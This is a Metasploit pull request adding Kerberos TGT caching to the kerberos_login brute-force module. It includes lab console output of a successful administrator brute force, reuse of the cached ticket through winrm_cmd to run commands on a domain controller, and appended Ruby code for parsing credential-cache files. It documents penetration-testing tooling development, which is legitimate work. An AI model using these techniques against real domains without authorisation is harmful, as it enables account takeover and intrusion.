
Save Kerberos tickets in the MSF cache upon a successful login #18421

Merged
merged 1 commit into from
Oct 23, 2023

Conversation

@smashery (Contributor) commented Oct 3, 2023

When we receive a successful Kerberos login (in the kerberos_login brute force module), we have an opportunity to cache the ticket. This is particularly helpful when a brute force is detected by a defender, and a user changes a user's password, because the ticket may still be valid until it expires. It also reduces the amount of interaction required with the DC in future.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Clear the Kerberos cache: klist -d
  • use kerberos_login
  • Run a successful brute force against an account
  • Verify that the user's TGT is stored in the MSF kerberos cache (klist)
  • Run a module that uses the TGT (e.g. winrm_cmd). Ensure that the TGT is used (do not provide the user's password in the command, and verify that the log shows the cached ticket being used)
  • With the kerberos_login module, run the command against an account with pre-auth not-required
  • Verify that the ticket is not placed in the kerberos cache.

@cdelafuente-r7 (Contributor)
Thanks @smashery! It looks good to me. I tested against Windows Server 2019 as a DC and followed the verification steps. I'll go ahead and land it.

Example output

  • Normal account
msf6 auxiliary(scanner/kerberos/kerberos_login) > run verbose=true rhosts=192.168.100.170 user_as_pass=true username=administrator domain=newlab.local password=123456

[*] Using domain: NEWLAB.LOCAL - 192.168.100.170:88   ...
[+] 192.168.100.170 - User found: "administrator" with password 123456. Hash: $krb5asrep$18$administrator@NEWLAB.LOCAL:<redacted>
[*] 192.168.100.170:88    - TGT MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231023145634_default_192.168.100.170_mit.kerberos.cca_100440.bin
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/kerberos/kerberos_login) > klist
Kerberos Cache
==============
id  host             principal                   sname                             issued                     status  path
--  ----             ---------                   -----                             ------                     ------  ----
44  192.168.100.170  administrator@NEWLAB.LOCAL  krbtgt/NEWLAB.LOCAL@NEWLAB.LOCAL  2023-10-23 14:56:34 +0200  active  /home/msfuser/.msf4/loot/20231023145634_default_192.168.100.170_mit.kerberos.cca_100440.bin

msf6 auxiliary(scanner/kerberos/kerberos_login) > use winrm_cmd

Matching Modules
================

   #  Name                               Disclosure Date  Rank    Check  Description
   -  ----                               ---------------  ----    -----  -----------
   0  auxiliary/scanner/winrm/winrm_cmd                   normal  No     WinRM Command Runner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/winrm/winrm_cmd

[*] Using auxiliary/scanner/winrm/winrm_cmd
msf6 auxiliary(scanner/winrm/winrm_cmd) > run verbose=true rhosts=192.168.100.170 username=administrator winrm::auth=kerberos winrm::rhostname=newdc01 domaincontrollerrhost=192.168.100.170 domain=newlab.local

[*] 192.168.100.170:88 - Using cached credential for krbtgt/NEWLAB.LOCAL@NEWLAB.LOCAL administrator@NEWLAB.LOCAL
[+] 192.168.100.170:88 - Received a valid TGS-Response
[*] 192.168.100.170:5985  - TGS MIT Credential Cache ticket saved to /home/msfuser/.msf4/loot/20231023150009_default_192.168.100.170_mit.kerberos.cca_891331.bin
[+] 192.168.100.170:88 - Received a valid delegation TGS-Response
[+] 192.168.100.170:88 - Received AP-REQ. Extracting session key...

Windows IP Configuration

   Host Name . . . . . . . . . . . . : NEWDC01
   Primary Dns Suffix  . . . . . . . : newlab.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : newlab.local

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-C1-13-D0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::423f:2c49:56c:e1ba%14(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.100.170(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.100.2
   DHCPv6 IAID . . . . . . . . . . . : 100666409
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2B-10-07-80-00-0C-29-C1-13-D0
   DNS Servers . . . . . . . . . . . : ::1
                                       127.0.0.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
[+] Results saved to /home/msfuser/.msf4/loot/20231023150010_default_192.168.100.170_winrm.cmd_result_245281.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • Account with pre-auth not-required
msf6 auxiliary(scanner/kerberos/kerberos_login) > klist
Kerberos Cache
==============
No tickets

msf6 auxiliary(scanner/kerberos/kerberos_login) > run verbose=true rhosts=192.168.100.170 user_as_pass=true username=smbtest domain=newlab.local password=123456

[*] Using domain: NEWLAB.LOCAL - 192.168.100.170:88   ...
[+] 192.168.100.170 - User: "smbtest" does not require preauthentication. Hash: $krb5asrep$23$smbtest@NEWLAB.LOCAL:<redacted>
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/kerberos/kerberos_login) > klist
Kerberos Cache
==============
No tickets
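Added example, not part of this PR and not Metasploit's own cache code: a minimal Ruby writer and reader for the MIT credential cache (ccache v4) layout that the `mit.kerberos.cca_*.bin` loot files above use, so a cached TGT can be inspected offline and its `endtime` checked the way the `klist` status column does. The sample it builds is constructed: administrator@NEWLAB.LOCAL with the issue time taken from the log above, an assumed 10-hour ticket lifetime, an all-zero session key and a placeholder ticket blob where a real cache holds the DER-encoded Ticket. Field order follows the ccache format description shipped with MIT Kerberos; the `CcacheExample` names are this example's own.

```ruby
require 'stringio'

# Added example (not Metasploit code): minimal MIT ccache v4 writer and reader.
# Session key and ticket bytes in the sample are constructed placeholders.
module CcacheExample
  VERSION_4 = "\x05\x04".b

  # A ccache 'data' field: big-endian uint32 length followed by the bytes.
  def self.data(bytes)
    [bytes.bytesize].pack('N') + bytes.b
  end

  # principal: name_type uint32, component count uint32, realm data, components data.
  def self.principal(realm, components, name_type)
    out = [name_type, components.length].pack('NN')
    out << data(realm)
    components.each { |c| out << data(c) }
    out
  end

  # Serialise a cache holding one credential record (here a TGT, sname krbtgt/REALM).
  def self.build(realm:, client:, sname:, enctype:, session_key:, authtime:, endtime:, ticket:)
    buf = String.new(encoding: Encoding::BINARY)
    buf << VERSION_4
    buf << [0].pack('n')                                 # header length 0: no header tags
    buf << principal(realm, client, 1)                   # default principal, NT-PRINCIPAL
    buf << principal(realm, client, 1)                   # credential: client
    buf << principal(realm, sname, 2)                    # credential: server, NT-SRV-INST
    buf << [enctype].pack('n') << data(session_key)      # keyblock (v4 has no etype field)
    buf << [authtime, authtime, endtime, 0].pack('NNNN') # authtime starttime endtime renew_till
    buf << [0].pack('C')                                 # is_skey
    buf << [0x40e10000].pack('N')                        # flags: forwardable renewable initial pre-authent
    buf << [0].pack('N')                                 # addresses: none
    buf << [0].pack('N')                                 # authdata: none
    buf << data(ticket)                                  # ticket (DER Ticket in a real cache)
    buf << data('')                                      # second_ticket: empty
    buf
  end

  class Reader
    def initialize(bytes)
      @io = StringIO.new(bytes.b)
    end

    def u8;   @io.read(1).unpack1('C'); end
    def u16;  @io.read(2).unpack1('n'); end
    def u32;  @io.read(4).unpack1('N'); end
    def data; @io.read(u32); end

    def principal
      u32                                                # name_type, not needed for display
      count = u32
      realm = data
      components = Array.new(count) { data }
      "#{components.join('/')}@#{realm}"
    end

    def parse
      raise 'not a version 4 ccache' unless @io.read(2) == VERSION_4
      @io.read(u16)                                      # skip header tags (e.g. DeltaTime)
      result = { default_principal: principal, credentials: [] }
      until @io.eof?
        c = {}
        c[:client] = principal
        c[:server] = principal
        c[:enctype] = u16
        c[:session_key] = data
        c[:authtime] = u32
        c[:starttime] = u32
        c[:endtime] = u32
        c[:renew_till] = u32
        c[:is_skey] = u8
        c[:flags] = u32
        u32.times { u16; data }                          # addresses: addrtype, data
        u32.times { u16; data }                          # authdata: adtype, data
        c[:ticket] = data
        c[:second_ticket] = data
        result[:credentials] << c
      end
      result
    end
  end

  # What the klist status column reduces to: the record stays usable until
  # endtime, whatever happened to the account's password after the AS exchange.
  def self.status(cred, now = Time.now.to_i)
    now < cred[:endtime] ? 'active' : 'expired'
  end

  AUTHTIME = Time.utc(2023, 10, 23, 12, 56, 34).to_i    # 14:56:34 +0200 in the log above

  # Constructed sample: the administrator TGT from the output above, assuming a
  # 10-hour lifetime; key and ticket bytes are placeholders.
  def self.sample_cache
    build(realm: 'NEWLAB.LOCAL', client: ['administrator'], sname: %w[krbtgt NEWLAB.LOCAL],
          enctype: 18, session_key: "\x00".b * 32, authtime: AUTHTIME,
          endtime: AUTHTIME + 10 * 3600, ticket: 'constructed-placeholder-ticket')
  end

  def self.demo
    Reader.new(sample_cache).parse
  end
end

if $PROGRAM_NAME == __FILE__
  CcacheExample.demo[:credentials].each do |c|
    puts format('%-28s %-34s %s %s', c[:client], c[:server], Time.at(c[:endtime]).utc, CcacheExample.status(c))
  end
end
```

Point a `Reader` at one of the loot `.bin` files to list what was cached. The reason the pre-auth-not-required case leaves the cache empty is visible in the record layout: a usable entry needs the session key, and that key sits in the AS-REP enc-part, which is encrypted under the user's long-term key. When pre-auth is off the module only obtains the AS-REP hash to crack offline, never the decrypted session key, so there is nothing worth writing.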

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Oct 23, 2023
@cdelafuente-r7 cdelafuente-r7 merged commit 77a8b0e into rapid7:master Oct 23, 2023
59 checks passed
@cdelafuente-r7 (Contributor)

Release Notes

This adds the capability to store the TGT ticket in the MSF kerberos cache when a successful Kerberos login is received by the kerberos_login brute force module.
